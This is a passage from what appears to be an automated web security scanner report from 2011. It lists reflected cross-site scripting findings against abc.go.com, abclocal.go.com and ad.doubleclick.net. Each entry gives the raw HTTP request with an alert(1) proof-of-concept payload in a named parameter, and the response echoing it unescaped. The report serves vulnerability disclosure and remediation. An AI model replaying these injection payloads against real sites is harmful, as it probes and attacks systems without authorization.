m/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=c68cf--><script>alert(1)</script>95f6c7f6244&pl=&brandid=001 -->
...[SNIP]...

1.31. http://abc.go.com/watch [pl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the pl request parameter is copied into an HTML comment. The payload ab41d--><script>alert(1)</script>4b90f52be3c was submitted in the pl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl=ab41d--><script>alert(1)</script>4b90f52be3c HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:42 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Cache-Expires: Wed, 23 Feb 2011 23:12:42 GMT
Content-Length: 16408
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl=ab41d--><script>alert(1)</script>4b90f52be3c&brandid=001 -->
...[SNIP]...

1.32. http://abc.go.com/watch [pl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the pl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38ed3"-alert(1)-"16bb995b9fc was submitted in the pl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl=38ed3"-alert(1)-"16bb995b9fc HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:41 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc03
Cache-Expires: Wed, 23 Feb 2011 23:12:40 GMT
Content-Length: 16360
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl=38ed3"-alert(1)-"16bb995b9fc&brandid=001","cookieName" : "abc_vp_breadcrumb" });
</script>
...[SNIP]...

1.33. http://abclocal.go.com/wls/story [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abclocal.go.com
Path:   /wls/story

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc0d5'%3balert(1)//06cec9ccd55 was submitted in the section parameter. This input was echoed as bc0d5';alert(1)//06cec9ccd55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wls/story?section=news/politicsbc0d5'%3balert(1)//06cec9ccd55&id=7977364&rss=rss-espnChicago-wls-article-7977364 HTTP/1.1
Host: abclocal.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=120
Date: Sat, 26 Feb 2011 01:50:29 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 26 Feb 2011 01:50:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc06
X-Powered-By: ASP.NET
Set-Cookie: SWID=A0C858BF-04E3-46C4-8DF4-ACF76E3CCD6D; path=/; expires=Sat, 26-Feb-2031 01:50:29 GMT; domain=.go.com;
Cache-Expires: Sat, 26 Feb 2011 01:53:29 GMT
Content-Length: 75131
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="e
...[SNIP]...
<a href="http://abclocal.go.com/wls/html5/video?id=7978923&pid=7977364&section=news/politicsbc0d5';alert(1)//06cec9ccd55">
...[SNIP]...

1.34. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eca1a"-alert(1)-"9f45c7913ea was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B5zgm-31lTcvxAcv1lAfG8bDkBfbMhfIBhtia8hf45pedJwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi00ODA5NDYwNzAyMDE2MDM3oAHOifnyA7IBEHd3dy5rb21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-4809460702016037&adurl=eca1a"-alert(1)-"9f45c7913ea HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8444
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 23 Feb 2011 21:38:14 GMT
Expires: Wed, 23 Feb 2011 21:38:14 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-4809460702016037&adurl=eca1a"-alert(1)-"9f45c7913eahttp://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm?withphone=N&CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = ""
...[SNIP]...

1.35. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be53b"-alert(1)-"3b9fd4c6033 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B5zgm-31lTcvxAcv1lAfG8bDkBfbMhfIBhtia8hf45pedJwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi00ODA5NDYwNzAyMDE2MDM3oAHOifnyA7IBEHd3dy5rb21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAEbe53b"-alert(1)-"3b9fd4c6033&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-4809460702016037&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt2___3533310**0_3805*MEn_114**_-862839443;ord=4972427075776531456258795481640? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Feb 2011 21:37:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9041

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
d3dy5rb21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAEbe53b"-alert(1)-"3b9fd4c6033&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-4809460702016037&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt
...[SNIP]...

1.36. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5cb52"-alert(1)-"1e7e78e8863 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B5zgm-31lTcvxAcv1lAfG8bDkBfbMhfIBhtia8hf45pedJwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi00ODA5NDYwNzAyMDE2MDM3oAHOifnyA7IBEHd3dy5rb21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-48094607020160375cb52"-alert(1)-"1e7e78e8863&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt2___3533310**0_3805*MEn_114**_-862839443;ord=4972427075776531456258795481640? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Feb 2011 21:38:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9041

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-48094607020160375cb52"-alert(1)-"1e7e78e8863&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt2___3533310**0_3805*MEn_114**_-862839443http%3a%2f%2fwww22.verizon.com/resid
...[SNIP]...

1.37. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e702a"-alert(1)-"d6cda420b15 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B5zgm-31lTcvxAcv1lAfG8bDkBfbMhfIBhtia8hf45pedJwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi00ODA5NDYwNzAyMDE2MDM3oAHOifnyA7IBEHd3dy5rb21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1e702a"-alert(1)-"d6cda420b15&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-4809460702016037&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt2___3533310**0_3805*MEn_114**_-862839443;ord=4972427075776531456258795481640? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Feb 2011 21:37:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9041

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
b21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1e702a"-alert(1)-"d6cda420b15&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-4809460702016037&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt2___35
...[SNIP]...

1.38. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d87dc"-alert(1)-"7e5e79f9c31 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B5zgm-31lTcvxAcv1lAfG8bDkBfbMhfIBhtia8hf45pedJwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi00ODA5NDYwNzAyMDE2MDM3oAHOifnyA7IBEHd3dy5rb21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWgd87dc"-alert(1)-"7e5e79f9c31&client=ca-pub-4809460702016037&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt2___3533310**0_3805*MEn_114**_-862839443;ord=4972427075776531456258795481640? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Feb 2011 21:38:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9078

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
YaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWgd87dc"-alert(1)-"7e5e79f9c31&client=ca-pub-4809460702016037&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt2___3533310**0_3805*MEn_114**_-862839443http%
...[SNIP]...

1.39. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99793"-alert(1)-"db897f05fa3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l99793"-alert(1)-"db897f05fa3&ai=B5zgm-31lTcvxAcv1lAfG8bDkBfbMhfIBhtia8hf45pedJwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi00ODA5NDYwNzAyMDE2MDM3oAHOifnyA7IBEHd3dy5rb21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-4809460702016037&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt2___3533310**0_3805*MEn_114**_-862839443;ord=4972427075776531456258795481640? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Feb 2011 21:37:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9118

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
rl = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ab7/f/283/%2a/t%3B236744794%3B2-0%3B0%3B56548503%3B4307-300/250%3B40625974/40643761/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=l99793"-alert(1)-"db897f05fa3&ai=B5zgm-31lTcvxAcv1lAfG8bDkBfbMhfIBhtia8hf45pedJwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi00ODA5NDYwNzAyMDE2MDM3oAHOifnyA7IBEHd3dy5rb21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3
...[SNIP]...

1.40. http://ad.doubleclick.net/adj/KOMO/HOME [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/KOMO/HOME

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27956'-alert(1)-'a0fcdcacbd9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/KOMO/HOME;sz=27956'-alert(1)-'a0fcdcacbd9 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.komonews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 50370
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 23 Feb 2011 21:38:11 GMT
Expires: Wed, 23 Feb 2011 21:38:11 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
